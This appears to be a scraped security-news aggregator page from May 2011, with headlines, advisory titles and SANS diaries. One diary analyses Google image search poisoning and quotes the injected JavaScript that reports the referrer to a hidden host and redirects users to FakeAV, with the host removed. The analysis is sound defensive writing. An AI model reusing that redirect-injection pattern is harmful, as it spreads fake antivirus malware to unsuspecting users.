Share |

InfoSec News

Isis, a mobile commerce joint venture of three major wireless carriers, has been working for months to engage Visa, MasterCard and major U.S. banks in smartphone payments with near-field communication (NFC) technology, an Isis executive clarified late on Wednesday.
Isis, a mobile commerce joint venture of three major wireless carriers, has been working for months to engage Visa, MasterCard and major U.S. banks in smartphone payments with near field communication (NFC) technology, an Isis executive clarified late on Wednesday.
Oracle Solaris CVE-2011-0820 Remote Kernel Vulnerability
Oracle's Hudson moves alienated the open source community, and those behind the fork say Oracle's latest move was also done without them
A California class action lawsuit puts Apple at the center of a conspiracy involving Google, Adobe, Intel and others to keep employee wages down.
Apple will reap more than three-fourths of all mobile app store revenues generated this year, but rival Google's growth is climbing faster, a research analyst said yesterday.
Red Hat claimed it is the only choice for openness in the cloud, as the open source vendor unveiled private cloud software and a public cloud service.
Apple said it would take a while to issue an iOS update to fix a handful of bugs related to the storage of location data, but its taken just seven days between that announcement and the appearance of iOS 4.3.3.
China has proposed strict new data security regulations that could hamper the country's nascent IT outsourcing industry if made into law, even as they aim to give foreign business leaders confidence in the way the Chinese handle sensitive business and personal data.
Meru's new Wi-Fi gear combines a trio of powerful 802.11n radios with a battery of new software that together will let enterprises replace wired Ethernet at the network's edge, the company says.
IT officers at different federal agencies recommend giving "the nerds, the geeks, and the young people" a chance to pen test systems.

Add to digg Add to StumbleUpon Add to Add to Google

Supply Chain Security and Usama bin Laden
CSO (blog)
For several years, I have been speaking about cyber jihadist activities, most notably about Al-Qa'eda and UBL (Usama bin Laden). During these talks at various places such as SecureworldExpo, RSA, ...

and more »
AT&T announced today that the tiny HP Veer 4G smartphone will go on sale May 15 for $99.99 with a two-year contract.
Oracle has subpoenaed the Apache Software Foundation in connection with its ongoing intellectual property suit against Google, the open-source group said Wednesday.
The Amazon Web Services Management Console can now handle Identity and Access Management (IAM) features offered in its cloud.
We have received notification that Sysinternals has had some updates.One in particular that is a favorite among handlers is Process Explorer. It now includes:

Process Explorer v14.11 includes the ability to configure network and disk activity icons in the tray.

Check out the Sysinternals web site for more details @
http : //
As you can see below you now have the option of Enabling Network and Disk Activity in the system tray.

Once Enabled

You can set them to be visible in the task bar, first click customize from your task bar options.

Then select show icons and notifications.

And there you have it, new things to stare at in your system icon tray.

Richard Porter
--- ISC Handler on Duty (c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
Intel has advanced its chip manufacturing technology with three-dimensional transistors that could make PCs, smartphones and tablets faster and more power-efficient.
[security bulletin] HPSBMA02667 SSRT100464 rev.3 - HP SiteScope, Cross Site Scripting (XSS) and HTML Injection
Cisco IOS SNMP Message Processing Denial Of Service Vulnerability
Cisco IOS UDP Denial of Service Vulnerability
[RT-SA-2011-004] Client Side Authorization ZyXEL ZyWALL USG Appliances Web Interface
Mojolicious 'link_to helper' HTML Injection Vulnerability
Iomega launched a new series of desktop and rack mountable NAS devices aimed at small- to medium-sized businesses and remote offices, with a price tag for the arrays of less than $4,000.
Isis, a consortium of three major U.S. wireless carriers, has reportedly decided to back off plans to develop a separate mobile payment network and will instead work within traditional systems that rely on major credit card companies Visa and MasterCard to handle mobile transactions.
ERP (enterprise resource planning) software investments aren't on this year's agenda for three-quarters of IT decision-makers who responded to a recent Forrester Research study, indicating that the global economic downturn's effects are still lingering.
Internap on Wednesday announced plans to enter the public cloud market later this year with two offerings: one based on VMware and another using the open source KVM hypervisor.
Microsoft Windows Kernel 'Win32k.sys' (CVE-2011-1233) Local Privilege Escalation Vulnerability
sipdroid SIP INVITE Response User Enumeration Weakness
Last week marked the second OpenStack Design Summit. OpenStack, if you're not familiar with it, is an open source project founded by a joint effort and code contribution of NASA and RackSpace; however, the project has grown rapidly and has many more participants today. Among companies participating in the OpenStack project: Cisco, Dell, NTT, Citrix, and many others., LibreOffice, IBM Lotus Symphony, SoftMaker Office, Corel WordPerfect, and Google Docs challenge the Microsoft juggernaut
libmodplug 'load_abc.cpp' Remote Stack Based Buffer Overflow Vulnerability
Horde Security Bypass and HTML Injection Vulnerabilities
Multiple ZyWALL USG Products Remote Security Bypass Vulnerability
SAP is attempting to give its StreamWork problem-solving software a more central role within customers' IT environments by linking the applications to its core ERP applications, the vendor announced Wednesday.
Security experts are urging Microsoft and Juniper to patch a year-old IPv6 vulnerability so dangerous it can freeze any Windows machine on a LAN in a matter of minutes.
GWT 2.3 adds more HTML5 capability, while Google Plugin for Eclipse features integration with Google services
Microsoft has released the first security update for Windows Phone 7, replicating for smartphone users a patch the company gave Windows desktop users six weeks ago.
A business intelligence project at Toyota Motors challenges a growing perception that IT organizations are no longer able to keep up with the BI demands of their business units.
In addition to a variety of new features, Mac OS X 10.7 'Lion' is getting something all new: Lion Server, which will be bundled with it for free.
Brocade Technologies, which announced 16G bps Fibre Channel products on Monday, is already working on a 32G bps version and expects to have it on the market within three years.
Sothink DHTML Menu 'id' Parameter SQL Injection Vulnerability
For last couple of weeks we received quite a bit of reports of images on Google leading to (usually) FakeAV web sites.

Google is doing a relatively good job removing (or at least marking) links leading to malware in normal searches, however, Googles image search seem to be plagued with malicious links. So how do they do this?
The activities behind the scenes to poison Googles image search are actually (and unfortunately) relatively simple. The steps in a typical campaign are very similar to those I described in two previous diaries (Down the RogueAV and Blackhat SEO rabbit hole part 1 at and part 2 at This is what the attackers do:

The attackers compromise a number of legitimate web sites. I have noticed that they usually attack Wordpress installations, but any widely spread software that has known vulnerabilities can be exploited.

Once the source (legitimate) web sites have been exploited, the attackers plant their PHP scripts, similar to those I described in previously mentioned diaries. These scripts vary from simple to very advanced scripts that can automatically monitor Google trend queries and create artificial web pages containing information that is currently interested. That is actually how they generate new content if you ever wondered how they had those web sites about Bin Laden up quickly it is because they automatically monitor the latest query trends and generate web pages with artificial content.

These web sites contain not only text, but also images that are acquired from various web sites. Again, their scripts use various search engines to locate these pictures (I will probably post a diary about this soon too). They embed links to pictures which are really related to the topic so the automatically generated web page contains real looking content.

Google now crawls through these web sites. The scripts that the attackers put will detect Googles bots (either by their IP address or the User Agent) and will deliver special pages back containing automatically generated content. Google will also parse links to images and, if appropriate, populate the image search database.

Now, when a user searches for something through the Google image search function, thumbnails of pictures are displayed. Depending on the automatically generated content in step 3), number of links to the web page and other parameters known to Google, the attackers page will be shown at a certain position in the results web page. The exploit happens when a user clicks on the thumbnail.

Google now shows a special page that shows the thumbnail in the center of the page, links to the original image (no matter where it is located) on the right and the original web site (the one that contained the image) in the background. This is where the vulnerability is. Google displays this in a simple iframe:

iframe scrolling=auto id=rf src=http://REMOVED frameborder=0 allowtransparency=true style=height:100%

The users browser will automatically send a request to the bad page which runs the attackers script (the one set in step 1). This script checks that the requests referrer field and if it contains Google (meaning this was a click on the results page in Google), the script displays a small JavaScript script:

scriptvar url = http://REMOVED/in.cgi?2seoref=+encodeURIComponent(document.referrer)+parameter=$keywordse=$seur=1HTTP_REFERER=+encodeURIComponent(document.URL)+default_keyword=default


This causes the browser to be redirected to another site that is serving FakeAV.

As we can see, the whole story behind this is relatively simple (for the attackers). There is a number of things to do here to protect against this attack, depending if we are looking at servers or clients. For a standard user, the best protection (besides not clicking on images is to install a Mozilla Firefox addon such as NoScript. Google could step up a bit as well, especially since this has been going on for more than a month already and there are numerous complaints on Googles forums about this. Since there are so many poisoned images they could maybe modify the screen that displays the results so it does not include the iframe that will help in first step only, since if the user lands on the malicious web page there is nothing Google can do really.


(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Posted by InfoSec News on May 03

By Doug Caruso
May 2, 2011

Columbus could be placing sensitive data in danger of theft when it
retires old computers, a security expert warned.

The city's Department of Technology receives guarantees from its
computer-disposal vendor that hard drives and other data-containing
computer parts have...

Posted by InfoSec News on May 03

The Chosunilbo
May 4, 2011

A computer network breakdown on April 12 in agricultural cooperative
lender Nonghyup was the result of a cyber attack North Korea's General
Bureau of Reconnaissance prepared meticulously for more than seven
months, a spokesman for the Seoul Central District Prosecutors' Office
said Tuesday.

A North Korean source said the...

Posted by InfoSec News on May 03

Forwarded from: DeepSec Conference <deepsec (at)>

--- DeepSec 2011 "High Five" - Call for Papers

For the fifth time the DeepSec In-Depth Security Conference invites
security researchers and professionals to submit suggestions for talks
and workshops for our conference which will take place in November 2011
in Vienna.

Please visit our updated website for more details about the venue, the
schedule and information...

Posted by InfoSec News on May 03

By Robert McMillan
IDG News Service
May 3, 2011

The U.S. Federal Bureau of Investigation warned computer users Tuesday
that messages claiming to include photos and videos of Osama bin Laden's
death actually contain a virus that could steal personal information.

The warning comes as security companies said that they've spotted the

Posted by InfoSec News on May 03

By Mathew J. Schwartz
May 03, 2011

The FBI's field offices lack the skills and expertise that they require
for investigating national cybersecurity intrusions, with many field
offices facing a shortage of forensic investigators and intelligence
analysts, as well as tactical intelligence for guiding investigations.

Those are some of the top-level...

Posted by InfoSec News on May 03

Bits - The New York Times
May 3, 2011

Last week, after the Sony PlayStation Network was attacked by a group of
unknown hackers, Sony’s 77 million customers, along with security
specialists and government officials, were surprised by the amount of
information that might have been stolen from the company.

But there was another group that worried about the...

Internet Storm Center Infocon Status